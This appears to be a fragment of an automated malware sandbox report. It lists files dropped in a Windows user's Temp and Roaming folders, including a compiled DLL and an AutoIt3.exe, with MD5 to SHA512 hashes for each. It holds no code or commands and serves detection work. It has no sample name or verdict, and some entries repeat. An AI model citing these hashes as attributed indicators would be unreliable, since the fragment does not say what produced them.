| SHA256 | 76280f88d11ea214a977fbc58c8b7de851c68bce0ee46d374c49692993ac160e |
| SHA512 | 650ddb7c90c832f132073a9a554a85f23fb5873cd787399328a726b6252136310394f67a63efbade3edc4b257f1b144587b9038f544883967e2673f56817e6df |
\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.0.cs
| MD5 | 35b3f48ba529849ae98e5f2c89b802f6 |
| SHA1 | e6ac7f0dff73e320ab7c09f5abb45dede87cfe81 |
| SHA256 | f8708957c3c4032d98bcdb50008ff132f1cef7b839521dc4ab9c22ba91a3bb61 |
| SHA512 | b6559f6f80520c9a29b1534022483cf2fcae200cac9c4c640cc2db9a7a1588122480f84561f858789067916e455aea57e45b346edb93dcd4a966b2ee4be7e153 |
\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP
| MD5 | 8e496206090242e39f6271276296462b |
| SHA1 | 07f828f2508306960880a50f1ed92cf329145216 |
| SHA256 | bafb4cc80f81fbe6e279eb6fe459a593e1db25a1dfe00e6957900eaa3fd1f3e8 |
| SHA512 | 96d99695374bc8fe0facfcde5e04b3a4207f785324d44e992b42df009d5e0cef308c6e61fc07af340c3f044d315cb51d3df9c3c2962a1d7d8e5c5ba54a736d4c |
C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp
| MD5 | f39a7ba4865db23805f3ab18e4a8b044 |
| SHA1 | 223f41b79dc26bedc3aa4178cf6c0e1ccefe63a5 |
| SHA256 | 034831ee6eca869f112c97711e0f11db36569623040c9fa33f93bb6fd0a7a778 |
| SHA512 | 2a787b7df3a7b3442c10f5f164fecaa2d51a475d79b423b63cace78924f35b07ad46426ad5bf8748548448b6200148522ef2848a5dcfb9af7318b9dbef102082 |
C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.dll
| MD5 | f53b6c79d1eb91d140ad67c4a638427e |
| SHA1 | 6358f57c5c334fb862252ac68ace0bdd0913ee73 |
| SHA256 | c3c0954a791a8d36e3d20685876b03a3afcf540ad91ca510ddb876b1af9bdb5e |
| SHA512 | c9688e618c361156965ecd14131b263c292f3c91af4603d604096129250fecc71a8c80f5300b2b280960361c1890da599630c573543a773c199668667a5bd16c |
C:\Users\Admin\AppData\Local\Temp\34A2.bi1
| MD5 | 82f12896705faeb1630b62f16d5f5cc8 |
| SHA1 | 9ed376a84dd777c28d4510cd747da4fbbc2ff63b |
| SHA256 | caccfc569992c55c1e532dd816a6e1846281397127c61e3403294d527780a35e |
| SHA512 | e1f04928aea8e710cd34fd6a0580ad9fe2f045485574b1ba4e4e7db376cffd9dacbc15e51f54cb247a85985739b0d70b9e783c1e573ceb8785fc0662be35c379 |
C:\Users\Admin\AppData\Local\Temp\34A2.bi1
| MD5 | 41a49d1a2a3a8713a12ccf89932d4bb7 |
| SHA1 | b324e8bbcd4ca71a35d0c00ac63c0255e8ec4287 |
| SHA256 | f210a8e30967b13dabe340c45ce4a97e9c94ad74975728eccdd0a27edf29b5fe |
| SHA512 | 1fc256f2068eb9ac32c04bad119e94ba006808fd2be48db397eecf69acd6d8972334f81f8439d6e153a9cb99db618a613f3b0adf2b5784c264b61d4d5c0669b1 |
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 2fbcc0fe1378d0ecf1b16a2afd880379 |
| SHA1 | 6d4b4dba0c4e745dee18ec08f26a438484806919 |
| SHA256 | 9b2a25150cdfabd658312ca8f336dbae5088de792e5913a7a7285c898278a3b5 |
| SHA512 | 6861298e070a56787c9be3d5af0ead74a4fcf2cb73f72538eebbfac03cdff87980de015686e631c546ce8b9ce1a4ff97156321500eb02b4ef7fbf9bf84cfe681 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 6359f1d7f512af3445b3f5982383fbd1 |
| SHA1 | d1a92ef7c4d8da438053fc22d95e7ea45074beb7 |
| SHA256 | 4ccc79cb5e7d191276a81b1a64562ebf0b317525aa93964b9f656cf08ff1c4f8 |
| SHA512 | 67d58a272a30e50e8ee6dedf0e202b056062a76ea80dbfb9a83af736d4e7d5b1b9d6e9cf8481cd8d6a362f298eeeeff2894f516d4b2278bb4ff42e267881f1cf |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 994674047487a307683fe927db53a879 |
| SHA1 | 08e266107bc3096bb9376853666eed498cf09343 |
| SHA256 | 9efdf86207323dbd235b7917b57f84a3fdb2616378d51097ac03784624e6429f |
| SHA512 | d4681aea5c3c7fa9d84773bf56e3542878c408154b84a15135f7ef2e7c5d8684949b071b5c120dbc2e81ab3eddee13543ae4c32118df82c868494a20fb1c5695 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 16b2f1ac1c08558ef924f916fc1973f0 |
| SHA1 | 14c1532ccc9fb0b08e91cfcde25e1943daf1ba15 |
| SHA256 | 51b0ac653327833065b870931c0ca2b7fce35a4f3d1483dfaa7931c7cae01412 |
| SHA512 | 4cd107a94140eaec7981097e6e0776be4a58431000a24d27c7670aabbdf1d31c36c451c7e264a0193fbcd0dd407edf3696bce6b3820625b65d6f9484ddc802a4 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 0e83ad975b02ea40288c7351d91965d8 |
| SHA1 | b7a4a38d4cce12929988ceec678472ab68d05aa6 |
| SHA256 | 7e17a7b1b26856ed724c1a28e6b73bfc786b53ff506bcf03629a25c30079509b |
| SHA512 | e13caf92517d1808a1e44e9a950e630edfcfba28e6a4eef4ea72688f86e8de388aeb5a4ce7f605c034e4036e9daebb90cb1be08ac1163daa7b26dcdffcaad7dd |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 339dd554d102558290e2de76f5a60d8d |
| SHA1 | b7f24902c9160a62538da4b1a3ad06a75e499846 |
| SHA256 | eb6545f7acab620335c3b48b85f1be8af2feba646f255c54584464a515aebdaf |
| SHA512 | a1a4b95a5b6a14da2fa75d4491d049571301e349c56427846d5917accd49a668746292366662d89c559fa7cdd0f0c10a1d839fe34ec9d33fe6851680e8f31509 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 339dd554d102558290e2de76f5a60d8d |
| SHA1 | b7f24902c9160a62538da4b1a3ad06a75e499846 |
| SHA256 | eb6545f7acab620335c3b48b85f1be8af2feba646f255c54584464a515aebdaf |
| SHA512 | a1a4b95a5b6a14da2fa75d4491d049571301e349c56427846d5917accd49a668746292366662d89c559fa7cdd0f0c10a1d839fe34ec9d33fe6851680e8f31509 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 160c46580d921a3cf99e8ced6ffa8b08 |
| SHA1 | 0b58056c96ada4476edb8aa27b2e4d7d67e36784 |
| SHA256 | ecaa7f10ef1ba9c6dbfaa4a2cd5e7aa3f59c9998dada43f0acd5ee1f922e7d1c |
| SHA512 | a54c1b8a1a0f893780578c38a6f5c0efd1233fc1c73ed89f324f6b927bfc8002929e52d7318ebbc657d2d372980a02200856fb0e95e4db29311bdd965e40effd |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 160c46580d921a3cf99e8ced6ffa8b08 |
| SHA1 | 0b58056c96ada4476edb8aa27b2e4d7d67e36784 |
| SHA256 | ecaa7f10ef1ba9c6dbfaa4a2cd5e7aa3f59c9998dada43f0acd5ee1f922e7d1c |
| SHA512 | a54c1b8a1a0f893780578c38a6f5c0efd1233fc1c73ed89f324f6b927bfc8002929e52d7318ebbc657d2d372980a02200856fb0e95e4db29311bdd965e40effd |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 107957a84d34fb483c5d57a4b209390e |
| SHA1 | bc85cf55d36b73cf2da81a6155f08fe83dd73706 |
| SHA256 | d5dbe818aacd7c39001bd0c9859c0dd95f3de5062c9dc52ffad9ec676822be8b |
| SHA512 | 6ab6d75fe57ca98ef7c79c567ce2d8b224f2491e2a1caf09a4a60663b39a75cada0ff6a98bb8c46fe6031cae657f4eef538c04566788b347b7c7fbda7900f184 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 107957a84d34fb483c5d57a4b209390e |
| SHA1 | bc85cf55d36b73cf2da81a6155f08fe83dd73706 |
| SHA256 | d5dbe818aacd7c39001bd0c9859c0dd95f3de5062c9dc52ffad9ec676822be8b |
| SHA512 | 6ab6d75fe57ca98ef7c79c567ce2d8b224f2491e2a1caf09a4a60663b39a75cada0ff6a98bb8c46fe6031cae657f4eef538c04566788b347b7c7fbda7900f184 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | a7cac69d6d46c2a9fb4300603e610a89 |
| SHA1 | 4e276aac065bd789ac5326ff50f558f4eb8b10ad |
| SHA256 | c483bf2841bb7a46c8695e21984f1c23004b3dcd6c073bf1d1306a31be2ef0e9 |
| SHA512 | 7413dd4c94a4eefb544302f752296dd24ae9512acff1104157b45ba01a83a190b2a98a5d9ce5fe37f67fe1db2947de4802186b6018ffa46db6d5e62bfc4895b5 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | a7cac69d6d46c2a9fb4300603e610a89 |
| SHA1 | 4e276aac065bd789ac5326ff50f558f4eb8b10ad |
| SHA256 | c483bf2841bb7a46c8695e21984f1c23004b3dcd6c073bf1d1306a31be2ef0e9 |
| SHA512 | 7413dd4c94a4eefb544302f752296dd24ae9512acff1104157b45ba01a83a190b2a98a5d9ce5fe37f67fe1db2947de4802186b6018ffa46db6d5e62bfc4895b5 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | aa8a190dfc32b0e52551f5d6916638fd |
| SHA1 | 2a0ab8b293dfaf0096ea682fa6ecf892c166e4ec |
| SHA256 | b67f7e023efe63997b626c91a7d2171eeb0d3c4dfc324d03e57003a577851ce6 |
| SHA512 | 216f351de51d1452cd43fb4a4ec77c8a0107f2970ad84736e9f2338a5fc6f421e9b25cfbbd356204fd9b717ff8defbbda1d480a11bde06576077846b3cedf16e |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | a626bbf47ed8a578753f6660b7bbb529 |
| SHA1 | 5e07b31adfc002789278bad48be486c175e36ab7 |
| SHA256 | 05731911f148538e4c7e4fae60b3adddab866063277862eac1eb59e004ab6f28 |
| SHA512 | ec855b34df3707d1e22a160b6136ee77874dd38ae7d85284fd3dd25ed3655b776234bd8fdfdfc49b5f37293dfacf2bf943bc4a904e648f1cb47cfee241a2f48c |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 5617c5deb94015ca242993228630629a |
| SHA1 | b15cf94530f6a983f93e5b392acdd622fdcf428e |
| SHA256 | 62ab7e8f2ece7ea7644816932fce4d3e2128c6ed6665611d26810a62f0e86a88 |
| SHA512 | a6cdfd99942e96369a5b674a1c99e8552339f8a9a068a04b09dbe6fcfe4c34c217cc539f5889859229692ce4c1ba665bcb707d5607374e30c906b89ecf4656e6 |
C:\Users\Admin\AppData\Local\Temp\58E.bin1
| MD5 | 2d83437387d79f44d862672df4847abc |
| SHA1 | bd43f56c8db76201680ed108d5ab862cc247ca0a |
| SHA256 | 3e0619aa8689c05e749f9083656404c93ff8dbf27fd01eb0ba07333f396ab211 |
| SHA512 | 56f2c8d57d9199cae37267ecbebe477194fbef5697456686a3043ecb8d36eb21718dedbd8d5a42902949c2155125ca5c168fd8fa2cb8ffac2288e0073ae385aa |
C:\Users\Admin\AppData\Local\Temp\58E.bin
| MD5 | 2d83437387d79f44d862672df4847abc |
| SHA1 | bd43f56c8db76201680ed108d5ab862cc247ca0a |
| SHA256 | 3e0619aa8689c05e749f9083656404c93ff8dbf27fd01eb0ba07333f396ab211 |
| SHA512 | 56f2c8d57d9199cae37267ecbebe477194fbef5697456686a3043ecb8d36eb21718dedbd8d5a42902949c2155125ca5c168fd8fa2cb8ffac2288e0073ae385aa |